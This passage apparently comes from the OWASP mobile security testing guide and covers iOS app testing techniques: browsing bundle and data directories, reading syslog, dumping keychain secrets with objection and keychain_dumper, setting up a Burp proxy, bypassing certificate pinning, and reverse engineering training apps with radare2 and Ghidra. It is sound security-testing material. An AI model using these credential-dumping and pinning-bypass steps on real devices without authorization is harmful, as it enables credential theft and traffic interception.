(see \"iOS Network Communication\")Please refer to the mentioned chapters to learn more about how to test each of these points.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#app-binary","title":"App Binary","text":"iOS app binaries are fat binaries (they can be deployed on all devices 32- and 64-bit). In contrast to Android, where you can actually decompile the app binary to Java code, the iOS app binaries can only be disassembled.
Refer to the chapter Tampering and Reverse Engineering on iOS for more details.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#native-libraries","title":"Native Libraries","text":"iOS apps can make their codebase modular by using different elements. In the MASTG we will refer to all of them as native libraries, but they can come in different forms:
.dylib
extension) are also used but must be part of a framework bundle. Standalone Dynamic Libraries are not supported on iOS, watchOS, or tvOS, except for the system Swift libraries provided by Xcode.XCFrameworks
): Xcode 11 supports distributing binary libraries using the XCFrameworks
format which is a new way to bundle up multiple variants of a Framework, e.g. for any of the platforms that Xcode supports (including simulator and devices). They can also bundle up static libraries (and their corresponding headers) and support binary distribution of Swift and C-based code. XCFrameworks
can be distributed as Swift Packages.You can view native libraries in Grapefruit by clicking on the Modules icon in the left menu bar:
And get a more detailed view including their imports/exports:
They are available in the Frameworks
folder in the IPA, you can also inspect them from the terminal:
$ ls -1 Frameworks/\nRealm.framework\nlibswiftCore.dylib\nlibswiftCoreData.dylib\nlibswiftCoreFoundation.dylib\n
or from the device with objection (as well as per SSH of course):
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection ... Name\n------------ ------- ------------------ ... ----------------------------\nDirectory 493 None ... Realm.framework\nRegular 420 None ... libswiftCore.dylib\nRegular 420 None ... libswiftCoreData.dylib\nRegular 420 None ... libswiftCoreFoundation.dylib\n...\n
Please note that this might not be the complete list of native code elements being used by the app as some can be part of the source code, meaning that they'll be compiled in the app binary and therefore cannot be found as standalone libraries or Frameworks in the Frameworks
folder.
For now this is all information you can get about the Frameworks unless you start reverse engineering them. Refer to the chapter Tampering and Reverse Engineering on iOS for more information about how to reverse engineer Frameworks.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#other-app-resources","title":"Other App Resources","text":"It is normally worth taking a look at the rest of the resources and files that you may find in the Application Bundle (.app) inside the IPA as sometimes they contain additional goodies like encrypted databases, certificates, etc.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0059/","title":"Accessing App Data Directories","text":"Once you have installed the app, there is further information to explore. Let's go through a short overview of the app folder structure on iOS apps to understand which data is stored where. The following illustration represents the application folder structure:
On iOS, system applications can be found in the /Applications
directory while user-installed apps are available under /private/var/containers/
. However, finding the right folder just by navigating the file system is not a trivial task as every app gets a random 128-bit UUID (Universal Unique Identifier) assigned for its directory names.
In order to easily obtain the installation directory information for user-installed apps you can use the following methods:
Connect to the terminal on the device and run the command ipainstaller
(IPA Installer Console) as follows:
iPhone:~ root# ipainstaller -l\n...\nOWASP.iGoat-Swift\n\niPhone:~ root# ipainstaller -i OWASP.iGoat-Swift\n...\nBundle: /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67\nApplication: /private/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app\nData: /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693\n
Using objection's command env
will also show you all the directory information of the app. Connecting to the application with objection is described in the section \"Recommended Tools - Objection\".
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env\n\nName Path\n----------------- -------------------------------------------------------------------------------------------\nBundlePath /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app\nCachesDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library/Caches\nDocumentDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents\nLibraryDirectory /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library\n
As you can see, apps have two main locations:
/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/
)./var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/
).These folders contain information that must be examined closely during application security assessments (for example when analyzing the stored data for sensitive data).
Bundle directory:
Data directory:
NSURLIsExcludedFromBackupKey
.Application Support
and Caches
subdirectories, but the app can create custom subdirectories.NSURLIsExcludedFromBackupKey
.NSUserDefaults
can be found in this file.Let's take a closer look at iGoat-Swift's Application Bundle (.app) directory inside the Bundle directory (/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app
):
OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection ... Name\n------------ ------- ------------------ ... --------------------------------------\nRegular 420 None ... rutger.html\nRegular 420 None ... mansi.html\nRegular 420 None ... splash.html\nRegular 420 None ... about.html\n\nRegular 420 None ... LICENSE.txt\nRegular 420 None ... Sentinel.txt\nRegular 420 None ... README.txt\n\nDirectory 493 None ... URLSchemeAttackExerciseVC.nib\nDirectory 493 None ... CutAndPasteExerciseVC.nib\nDirectory 493 None ... RandomKeyGenerationExerciseVC.nib\nDirectory 493 None ... KeychainExerciseVC.nib\nDirectory 493 None ... CoreData.momd\nRegular 420 None ... archived-expanded-entitlements.xcent\nDirectory 493 None ... SVProgressHUD.bundle\n\nDirectory 493 None ... Base.lproj\nRegular 420 None ... Assets.car\nRegular 420 None ... PkgInfo\nDirectory 493 None ... _CodeSignature\nRegular 420 None ... AppIcon60x60@3x.png\n\nDirectory 493 None ... Frameworks\n\nRegular 420 None ... embedded.mobileprovision\n\nRegular 420 None ... Credentials.plist\nRegular 420 None ... Assets.plist\nRegular 420 None ... Info.plist\n\nRegular 493 None ... iGoat-Swift\n
You can also visualize the Bundle directory from Grapefruit by clicking on Finder -> Bundle:
Including the Info.plist
file:
As well as the Data directory in Finder -> Home:
Refer to the Testing Data Storage chapter for more information and best practices on securely storing sensitive data.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0060/","title":"Monitoring System Logs","text":"Many apps log informative (and potentially sensitive) messages to the console log. The log also contains crash reports and other useful information. You can collect console logs through the Xcode Devices window as follows:
To save the console output to a text file, go to the top right side of the Console window and click on the Save button.
You can also connect to the device shell as explained in Accessing the Device Shell, install socat via apt-get and run the following command:
iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock\n\n========================\nASL is here to serve you\n> watch\nOK\n\nJun 7 13:42:14 iPhone chmod[9705] <Notice>: MS:Notice: Injecting: (null) [chmod] (1556.00)\nJun 7 13:42:14 iPhone readlink[9706] <Notice>: MS:Notice: Injecting: (null) [readlink] (1556.00)\nJun 7 13:42:14 iPhone rm[9707] <Notice>: MS:Notice: Injecting: (null) [rm] (1556.00)\nJun 7 13:42:14 iPhone touch[9708] <Notice>: MS:Notice: Injecting: (null) [touch] (1556.00)\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/","title":"Dumping KeyChain Data","text":"Dumping the KeyChain data can be done with multiple tools, but not all of them will work on any iOS version. As is more often the case, try the different tools or look up their documentation for information on the latest supported versions.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#objection-jailbroken-non-jailbroken","title":"Objection (Jailbroken / non-Jailbroken)","text":"The KeyChain data can easily be viewed using Objection. First, connect objection to the app as described in \"Recommended Tools - Objection\". Then, use the ios keychain dump
command to get an overview of the keychain:
$ objection --gadget=\"iGoat-Swift\" explore\n... [usb] # ios keychain dump\n...\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------- -------------------------- ----------------------------------------------------------------------\n2019-06-06 10:53:09 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.dvia mypassword123\n2019-06-06 10:53:30 +0000 WhenUnlockedThisDeviceOnly None Password SCAPILazyVector com.toyopagroup.picaboo (failed to decode)\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password fideliusDeviceGraph com.toyopagroup.picaboo (failed to decode)\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password SCDeviceTokenKey2 com.toyopagroup.picaboo 00001:FKsDMgVISiavdm70v9Fhv5z+pZfBTTN7xkwSwNvVr2IhVBqLsC7QBhsEjKMxrEjh\n2019-06-06 10:53:30 +0000 AfterFirstUnlockThisDeviceOnly None Password SCDeviceTokenValue2 com.toyopagroup.picaboo CJ8Y8K2oE3rhOFUhnxJxDS1Zp8Z25XzgY2EtFyMbW3U=\nOWASP.iGoat-Swift on (iPhone: 12.0) [usb] # quit \n
Note that currently, the latest versions of frida-server and objection do not correctly decode all keychain data. Different combinations can be tried to increase compatibility. For example, the previous printout was created with frida-tools==1.3.0
, frida==12.4.8
and objection==1.5.0
.
Finally, since the keychain dumper is executed from within the application context, it will only print out keychain items that can be accessed by the application and not the entire keychain of the iOS device.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#grapefruit-jailbroken-non-jailbroken","title":"Grapefruit (Jailbroken / non-Jailbroken)","text":"With Grapefruit it's possible to access the keychain data of the app you have selected. Inside the Storage section, click on Keychain and you can see a listing of the stored Keychain information.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0061/#keychain-dumper-jailbroken","title":"Keychain-dumper (Jailbroken)","text":"You can use Keychain-dumper to dump the jailbroken device's KeyChain contents. Once you have it running on your device:
iPhone:~ root# /tmp/keychain_dumper\n\n(...)\n\nGeneric Password\n----------------\nService: myApp\nAccount: key3\nEntitlement Group: RUD9L355Y.sg.vantagepoint.example\nLabel: (null)\nGeneric Field: (null)\nKeychain Data: SmJSWxEs\n\nGeneric Password\n----------------\nService: myApp\nAccount: key7\nEntitlement Group: RUD9L355Y.sg.vantagepoint.example\nLabel: (null)\nGeneric Field: (null)\nKeychain Data: WOg1DfuH\n
In newer versions of iOS (iOS 11 and up), additional steps are necessary. See the README.md for more details. Note that this binary is signed with a self-signed certificate that has a \"wildcard\" entitlement. The entitlement grants access to all items in the Keychain. If you are paranoid or have very sensitive private data on your test device, you may want to build the tool from source and manually sign the appropriate entitlements into your build; instructions for doing this are available in the GitHub repository.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0062/","title":"Basic Network Monitoring/Sniffing","text":"You can remotely sniff all traffic in real-time on iOS by creating a Remote Virtual Interface for your iOS device. First make sure you have Wireshark installed on your macOS host computer.
$ rvictl -s <UDID>\nStarting device <UDID> [SUCCEEDED] with interface rvi0\n
ip.addr == 192.168.1.1 && http\n
The documentation of Wireshark offers many examples for Capture Filters that should help you to filter the traffic to get the information you want.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0063/","title":"Setting up an Interception Proxy","text":"Burp Suite is an integrated platform for security testing mobile and web applications. Its tools work together seamlessly to support the entire testing process, from initial mapping and analysis of attack surfaces to finding and exploiting security vulnerabilities. Burp Proxy operates as a web proxy server for Burp Suite, which is positioned as a man-in-the-middle between the browser and web server(s). Burp Suite allows you to intercept, inspect, and modify incoming and outgoing raw HTTP traffic.
Setting up Burp to proxy your traffic is pretty straightforward. We assume that both your iOS device and host computer are connected to a Wi-Fi network that permits client-to-client traffic. If client-to-client traffic is not permitted, you can use usbmuxd to connect to Burp via USB.
PortSwigger provides a good tutorial on setting up an iOS device to work with Burp and a tutorial on installing Burp's CA certificate to an iOS device.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0063/#using-burp-via-usb-on-a-jailbroken-device","title":"Using Burp via USB on a Jailbroken Device","text":"In the section Accessing the Device Shell we've already learned how we can use iproxy to use SSH via USB. When doing dynamic analysis, it's interesting to use the SSH connection to route our traffic to Burp that is running on our computer. Let's get started:
First we need to use iproxy to make SSH from iOS available on localhost.
$ iproxy 2222 22\nwaiting for connection\n
The next step is to make a remote port forwarding of port 8080 on the iOS device to the localhost interface on our computer to port 8080.
ssh -R 8080:localhost:8080 root@localhost -p 2222\n
You should now be able to reach Burp on your iOS device. Open Safari on iOS and go to 127.0.0.1:8080 and you should see the Burp Suite Page. This would also be a good time to install the CA certificate of Burp on your iOS device.
The last step would be to set the proxy globally on your iOS device:
Open Safari and go to any webpage, you should see now the traffic in Burp. Thanks @hweisheimer for the initial idea!
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/","title":"Bypassing Certificate Pinning","text":"Some applications will implement SSL Pinning, which prevents the application from accepting your intercepting certificate as a valid certificate. This means that you will not be able to monitor the traffic between the application and the server.
For most applications, certificate pinning can be bypassed within seconds, but only if the app uses the API functions that are covered by these tools. If the app is implementing SSL Pinning with a custom framework or library, the SSL Pinning must be manually patched and deactivated, which can be time-consuming.
This section describes various ways to bypass SSL Pinning and gives guidance about what you should do when the existing tools don't work.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/#methods-for-jailbroken-and-non-jailbroken-devices","title":"Methods for Jailbroken and Non-jailbroken Devices","text":"If you have a jailbroken device with frida-server installed, you can bypass SSL pinning by running the following Objection command (repackage your app if you're using a non-jailbroken device):
ios sslpinning disable\n
Here's an example of the output:
See also Objection's help on Disabling SSL Pinning for iOS for further information and inspect the pinning.ts file to understand how the bypass works.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0064/#methods-for-jailbroken-devices-only","title":"Methods for Jailbroken Devices Only","text":"If you have a jailbroken device you can try one of the following tools that can automatically disable SSL Pinning:
Technologies and systems change over time, and some bypass techniques might not work eventually. Hence, it's part of the tester work to do some research, since not every tool is able to keep up with OS versions quickly enough.
Some apps might implement custom SSL pinning methods, so the tester could also develop new bypass scripts making use of existing ones as a base or inspiration and using similar techniques but targeting the app's custom APIs. Here you can inspect three good examples of such scripts:
Other Techniques:
If you don't have access to the source, you can try binary patching:
NSURLSession
, CFStream
, and AFNetworking
and methods/strings containing words like \"pinning\", \"X.509\", \"Certificate\", etc.iOS reverse engineering is a mixed bag. On one hand, apps programmed in Objective-C and Swift can be disassembled nicely. In Objective-C, object methods are called via dynamic function pointers called \"selectors\", which are resolved by name during runtime. The advantage of runtime name resolution is that these names need to stay intact in the final binary, making the disassembly more readable. Unfortunately, this also means that no direct cross-references between methods are available in the disassembler and constructing a flow graph is challenging.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0065/#references","title":"References","text":"The preferred method of statically analyzing iOS apps involves using the original Xcode project files. Ideally, you will be able to compile and debug the app to quickly identify any potential issues with the source code.
Black box analysis of iOS apps without access to the original source code requires reverse engineering. For example, no decompilers are available for iOS apps (although most commercial and open-source disassemblers can provide a pseudo-source code view of the binary), so a deep inspection requires you to read assembly code.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0067/","title":"Dynamic Analysis on iOS","text":"Life is easy with a jailbroken device: not only do you gain easy privileged access to the device, the lack of code signing allows you to use more powerful dynamic analysis techniques. On iOS, most dynamic analysis tools are based on Cydia Substrate, a framework for developing runtime patches, or Frida, a dynamic introspection tool. For basic API monitoring, you can get away with not knowing all the details of how Substrate or Frida work - you can simply use existing API monitoring tools.
On iOS, collecting basic information about a running process or an application can be slightly more challenging than on Android. On Android (or any Linux-based OS), process information is exposed as readable text files via procfs. Thus, any information about a target process can be obtained on a rooted device by parsing these text files. In contrast, on iOS there is no procfs equivalent present. Also, on iOS many standard UNIX command line tools for exploring process information, for instance lsof and vmmap, are removed to reduce the firmware size.
In this section, we will learn how to collect process information on iOS using command line tools like lsof. Since many of these tools are not present on iOS by default, we need to install them via alternative methods. For instance, lsof can be installed using Cydia (the executable is not the latest version available, but nevertheless addresses our purpose).
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0068/","title":"Disassembling Native Code","text":"Because Objective-C and Swift are fundamentally different, the programming language in which the app is written affects the possibilities for reverse engineering it. For example, Objective-C allows method invocations to be changed at runtime. This makes hooking into other app functions (a technique heavily used by Cycript and other reverse engineering tools) easy. This \"method swizzling\" is not implemented the same way in Swift, and the difference makes the technique harder to execute with Swift than with Objective-C.
On iOS, all the application code (both Swift and Objective-C) is compiled to machine code (e.g. ARM). Thus, to analyze iOS applications a disassembler is needed.
If you want to disassemble an application from the App Store, remove the Fairplay DRM first. Section \"Acquiring the App Binary\" in the chapter \"iOS Basic Security Testing\" explains how.
In this section the term \"app binary\" refers to the Mach-O file in the application bundle which contains the compiled code, and should not be confused with the application bundle - the IPA file. See section \"Exploring the App Package\" in chapter \"Basic iOS Security Testing\" for more details on the composition of IPA files.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0068/#disassembling-with-ida-pro","title":"Disassembling With IDA Pro","text":"If you have a license for IDA Pro, you can analyze the app binary using IDA Pro as well.
The free version of IDA unfortunately does not support the ARM processor type.
To get started, simply open the app binary in IDA Pro.
Upon opening the file, IDA Pro will perform auto-analysis, which can take a while depending on the size of the binary. Once the auto-analysis is completed you can browse the disassembly in the IDA View (Disassembly) window and explore functions in the Functions window, both shown in the screenshot below.
A regular IDA Pro license does not include a decompiler by default and requires an additional license for the Hex-Rays decompiler, which is expensive. In contrast, Ghidra comes with a very capable free builtin decompiler, making it a compelling alternative to use for reverse engineering.
If you have a regular IDA Pro license and do not want to buy the Hex-Rays decompiler, you can use Ghidra's decompiler by installing the GhIDA plugin for IDA Pro.
The majority of this chapter applies to applications written in Objective-C or having bridged types, which are types compatible with both Swift and Objective-C. The Swift compatibility of most tools that work well with Objective-C is being improved.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0069/","title":"Decompiling Native Code","text":"TODO. Hopper is only mentioned once in the entire document, ghidra is only used for disassembly, ... We can expand this, maybe add some good ghidra snippets for objective-c mapping, ...
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/","title":"Extracting Information from the Application Binary","text":"You can use radare to get information about the binary, such as the architecture, the list of shared libraries, the list of classes and methods, strings and more.
Let's use the Damn Vulnerable iOS App DVIA v1 as an example. Open its main binary with radare2:
r2 DamnVulnerableIOSApp\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#binary-information","title":"Binary Information","text":"To get information about the binary, you can use the i
command. This command will list information about the binary, such as the architecture, the list of shared libraries, the list of classes and methods, strings and more.
[0x1000180c8]> i\n...\nsize 0x43d5f0\nhumansz 4.2M\nmode r-x\nformat mach064\niorw false\nblock 0x100\npacket xtr.fatmach0\n...\nlang objc with blocks\nlinenum false\nlsyms false\nnx false\nos ios\npic true\nrelocs true\nsanitize false\nstatic false\nstripped true\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#classes-and-methods","title":"Classes and Methods","text":"And then we can proceed to extract information about the methods in the application's source code. To do this, we need to load the application binary into radare and then list the classes and methods in the binary.
[0x1000180c8]> icc\n\n...\n\n@interface SFAntiPiracy : NSObject\n{\n}\n+ (int) isPirated\n+ (int) isJailbroken\n+ (void) killApplication\n+ (bool) isTheDeviceJailbroken\n+ (bool) isTheApplicationCracked\n+ (bool) isTheApplicationTamperedWith\n+ (int) urlCheck\n...\n@end\n
Note the plus sign, which means that this is a class method that returns a BOOL type. A minus sign would mean that this is an instance method. Refer to later sections to understand the practical difference between these.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#linked-libraries","title":"Linked Libraries","text":"The following command is listing shared libraries:
[0x1000180c8]> il\n[Linked libraries]\n/System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguration\n/System/Library/Frameworks/StoreKit.framework/StoreKit\n/System/Library/Frameworks/Security.framework/Security\n/System/Library/Frameworks/QuartzCore.framework/QuartzCore\n/System/Library/Frameworks/MobileCoreServices.framework/MobileCoreServices\n/usr/lib/libz.1.dylib\n/System/Library/Frameworks/CoreLocation.framework/CoreLocation\n/System/Library/Frameworks/CoreGraphics.framework/CoreGraphics\n/System/Library/Frameworks/CFNetwork.framework/CFNetwork\n/System/Library/Frameworks/AudioToolbox.framework/AudioToolbox\n/System/Library/Frameworks/CoreData.framework/CoreData\n/System/Library/Frameworks/UIKit.framework/UIKit\n/System/Library/Frameworks/Foundation.framework/Foundation\n/usr/lib/libobjc.A.dylib\n/usr/lib/libSystem.B.dylib\n/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation\n\n16 libraries\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0070/#strings","title":"Strings","text":"Obtaining strings is very useful when reverse engineering an app because it can give you a lot of information about the app's functionality. For example, you can find URLs, API endpoints, encryption keys, and more. You can also find strings that will point you to interesting functions, such as the login function or a function that checks whether the device is jailbroken.
[0x1000180c8]> izz~cstring | less\n\n\n29903 0x001d0b4c 0x1001d0b4c 5 6 5.__TEXT.__cstring ascii Admin\n29904 0x001d0b52 0x1001d0b52 13 14 5.__TEXT.__cstring ascii This!sA5Ecret\n29905 0x001d0b60 0x1001d0b60 15 16 5.__TEXT.__cstring ascii pushSuccessPage\n29906 0x001d0b70 0x1001d0b70 4 5 5.__TEXT.__cstring ascii Oops\n29907 0x001d0b75 0x1001d0b75 30 31 5.__TEXT.__cstring ascii Incorrect Username or Password\n29908 0x001d0b94 0x1001d0b94 17 18 5.__TEXT.__cstring ascii usernameTextField\n29909 0x001d0ba6 0x1001d0ba6 39 40 5.__TEXT.__cstring ascii T@\"UITextField\",&,N,V_usernameTextField\n29910 0x001d0bce 0x1001d0bce 17 18 5.__TEXT.__cstring ascii passwordTextField\n...\n29915 0x001d0ca8 0x1001d0ca8 18 19 5.__TEXT.__cstring ascii http://google.com/\n29926 0x001d0d73 0x1001d0d73 37 38 5.__TEXT.__cstring ascii Request Sent using pinning, lookout !\n29927 0x001d0d99 0x1001d0d99 77 78 5.__TEXT.__cstring ascii Certificate validation failed. \n You will have to do better than this, my boy!!\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0071/","title":"Retrieving Strings","text":"Strings are always a good starting point while analyzing a binary, as they provide context to the associated code. For instance, an error log string such as \"Cryptogram generation failed\" gives us a hint that the adjoining code might be responsible for the generation of a cryptogram.
In order to extract strings from an iOS binary, you can use GUI tools such as Ghidra or iaito or rely on CLI-based tools such as the strings Unix utility (strings <path_to_binary>
) or radare2's rabin2 (rabin2 -zz <path_to_binary>
). When using the CLI-based ones you can take advantage of other tools such as grep (e.g. in conjunction with regular expressions) to further filter and analyze the results.
Ghidra can be used for analyzing the iOS binaries and obtaining cross references by right clicking the desired function and selecting Show References to.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0073/","title":"Information Gathering - API Usage","text":"The iOS platform provides many built-in libraries for frequently used functionalities in applications, for example cryptography, Bluetooth, NFC, network and location libraries. Determining the presence of these libraries in an application can give us valuable information about its underlying working.
For instance, if an application is importing the CC_SHA256
function, it indicates that the application will be performing some kind of hashing operation using the SHA256 algorithm. Further information on how to analyze iOS's cryptographic APIs is discussed in the section \"iOS Cryptographic APIs\".
Similarly, the above approach can be used to determine where and how an application is using Bluetooth. For instance, an application performing communication using the Bluetooth channel must use functions from the Core Bluetooth framework such as CBCentralManager
or connect
. Using the iOS Bluetooth documentation you can determine the critical functions and start analysis around those function imports.
Most of the apps you might encounter connect to remote endpoints. Even before you perform any dynamic analysis (e.g. traffic capture and analysis), you can obtain some initial inputs or entry points by enumerating the domains to which the application is supposed to communicate.
Typically these domains will be present as strings within the binary of the application. One can extract domains by retrieving strings (as discussed above) or checking the strings using tools like Ghidra. The latter option has a clear advantage: it can provide you with context, as you'll be able to see in which context each domain is being used by checking the cross-references.
From here on you can use this information to derive more insights which might be of use later during your analysis, e.g. you could match the domains to the pinned certificates or perform further reconnaissance on domain names to know more about the target environment.
The implementation and verification of secure connections can be an intricate process and there are numerous aspects to consider. For instance, many applications use other protocols apart from HTTP such as XMPP or plain TCP packets, or perform certificate pinning in an attempt to deter MITM attacks.
Remember that in most cases, using only static analysis will not be enough and might even turn out to be extremely inefficient when compared to the dynamic alternatives which will get much more reliable results (e.g. using an interception proxy). In this section we've only touched the surface, so please refer to the section \"Basic Network Monitoring/Sniffing\" in the \"iOS Basic Security Testing\" chapter and check out the test cases in the chapter \"iOS Network Communication\" for further information.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0076/","title":"Reviewing Disassembled Objective-C and Swift Code","text":"In this section we will explore an iOS application's binary code manually and perform static analysis on it. Manual analysis can be a slow process and requires immense patience. A good manual analysis can make the dynamic analysis more successful.
There are no hard written rules for performing static analysis, but there are a few rules of thumb which can be used to have a systematic approach to manual analysis:
Techniques discussed in this section are generic and applicable irrespective of the tools used for analysis.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0076/#objective-c","title":"Objective-C","text":"In addition to the techniques learned in the \"Disassembling and Decompiling\" section, for this section you'll need some understanding of the Objective-C runtime. For instance, functions like _objc_msgSend
or _objc_release
are specially meaningful for the Objective-C runtime.
We will be using the UnCrackable App for iOS Level 1, which has the simple goal of finding a secret string hidden somewhere in the binary. The application has a single home screen and a user can interact via inputting custom strings in the provided text field.
When the user inputs the wrong string, the application shows a pop-up with the \"Verification Failed\" message.
You can keep note of the strings displayed in the pop-up, as this might be helpful when searching for the code where the input is processed and a decision is being made. Luckily, the complexity and interaction with this application is straightforward, which bodes well for our reversing endeavors.
For static analysis in this section, we will be using Ghidra 9.0.4. Ghidra 9.1_beta auto-analysis has a bug and does not show the Objective-C classes.
We can start by checking the strings present in the binary by opening it in Ghidra. The listed strings might be overwhelming at first, but with some experience in reversing Objective-C code, you'll learn how to filter and discard the strings that are not really helpful or relevant. For instance, the ones shown in screenshot below, which are generated for the Objective-C runtime. Other strings might be helpful in some cases, such as those containing symbols (function names, class names, etc.) and we'll be using them when performing static analysis to check if some specific function is being used.
If we continue our careful analysis, we can spot the string, \"Verification Failed\", which is used for the pop-up when a wrong input is given. If you follow the cross-references (Xrefs) of this string, you will reach buttonClick
function of the ViewController
class. We will look into the buttonClick
function later in this section. When further checking the other strings in the application, only a few of them look like likely candidates for a hidden flag. You can try them and verify as well.
Moving forward, we have two paths to take. Either we can start analyzing the buttonClick
function identified in the above step, or start analyzing the application from the various entry points. In a real-world situation, most of the time you will take the first path, but from a learning perspective, in this section we will take the latter path.
An iOS application calls different predefined functions provided by the iOS runtime depending on its state within the application life cycle. These functions are known as the entry points of the app. For example:
[AppDelegate application:didFinishLaunchingWithOptions:]
is called when the application is started for the first time.[AppDelegate applicationDidBecomeActive:]
is called when the application is moving from inactive to active state.Many applications execute critical code in these sections and therefore they're normally a good starting point in order to follow the code systematically.
Once we're done with the analysis of all the functions in the AppDelegate
class, we can conclude that there is no relevant code present. The lack of any code in the above functions raises the question - from where is the application's initialization code being called?
Luckily the current application has a small code base, and we can find another ViewController
class in the Symbol Tree view. In this class, function viewDidLoad
function looks interesting. If you check the documentation of viewDidLoad
, you can see that it can also be used to perform additional initialization on views.
If we check the decompilation of this function, there are a few interesting things going on. For instance, there is a call to a native function at line 31 and a label is initialized with a setHidden
flag set to 1 in lines 27-29. You can keep a note of these observations and continue exploring the other functions in this class. For brevity, exploring the other parts of the function is left as an exercise for the readers.
In our first step, we observed that the application verifies the input string only when the UI button is pressed. Thus, analyzing the buttonClick
function is an obvious target. As earlier mentioned, this function also contains the string we see in the pop-ups. At line 29 a decision is being made, which is based on the result of isEqualString
(output saved in uVar1
at line 23). The input for the comparison is coming from the text input field (from the user) and the value of the label
. Therefore, we can assume that the hidden flag is stored in that label.
Now we have followed the complete flow and have all the information about the application flow. We also concluded that the hidden flag is present in a text label and in order to determine the value of the label, we need to revisit viewDidLoad
function, and understand what is happening in the native function identified. Analysis of the native function is discussed in \"Reviewing Disassembled Native Code\".
Analyzing disassembled native code requires a good understanding of the calling conventions and instructions used by the underlying platform. In this section we are looking in ARM64 disassembly of the native code. A good starting point to learn about ARM architecture is available at Introduction to ARM Assembly Basics by Azeria Labs Tutorials. This is a quick summary of the things that we will be using in this section:
As mentioned above as well, Objective-C code is also compiled to native binary code, but analyzing C/C++ native can be more challenging. In case of Objective-C there are various symbols (especially function names) present, which eases the understanding of the code. In the above section we've learned that the presence of function names like setText
, isEqualStrings
can help us in quickly understanding the semantics of the code. In case of C/C++ native code, if all the binaries are stripped, there can be very few or no symbols present to assist us into analyzing it.
Decompilers can help us in analyzing native code, but they should be used with caution. Modern decompilers are very sophisticated and among many techniques used by them to decompile code, a few of them are heuristics based. Heuristics based techniques might not always give correct results, one such case being, determining the number of input parameters for a given native function. Having knowledge of analyzing disassembled code, assisted with decompilers can make analyzing native code less error prone.
We will be analyzing the native function identified in viewDidLoad
function in the previous section. The function is located at offset 0x1000080d4. The return value of this function is used in the setText
function call for the label. This text is used to compare against the user input. Thus, we can be sure that this function will be returning a string or equivalent.
The first thing we can see in the disassembly of the function is that there is no input to the function. The registers X0-X7 are not read throughout the function. Also, there are multiple calls to other functions like the ones at 0x100008158, 0x10000dbf0 etc.
The instructions corresponding to one such function call can be seen below. The branch instruction bl
is used to call the function at 0x100008158.
1000080f0 1a 00 00 94 bl FUN_100008158\n1000080f4 60 02 00 39 strb w0,[x19]=>DAT_10000dbf0\n
The return value from the function (found in W0), is stored to the address in register X19 (strb
stores a byte to the address in register). We can see the same pattern for other function calls, the returned value is stored in the X19 register and each time the offset is one more than the previous function call. This behavior can be associated with populating each index of a string array at a time. Each return value is written to an index of this string array. There are 11 such calls, and from the current evidence we can make an intelligent guess that the length of the hidden flag is 11. Towards the end of the disassembly, the function returns with the address to this string array.
100008148 e0 03 13 aa mov x0=>DAT_10000dbf0,x19\n
To determine the value of the hidden flag we need to know the return value of each of the subsequent function calls identified above. When analyzing the function 0x100006fb4, we can observe that this function is much bigger and more complex than the previous one we analyzed. Function graphs can be very helpful when analyzing complex functions, as they help in better understanding the control flow of the function. Function graphs can be obtained in Ghidra by clicking the Display function graph icon in the sub-menu.
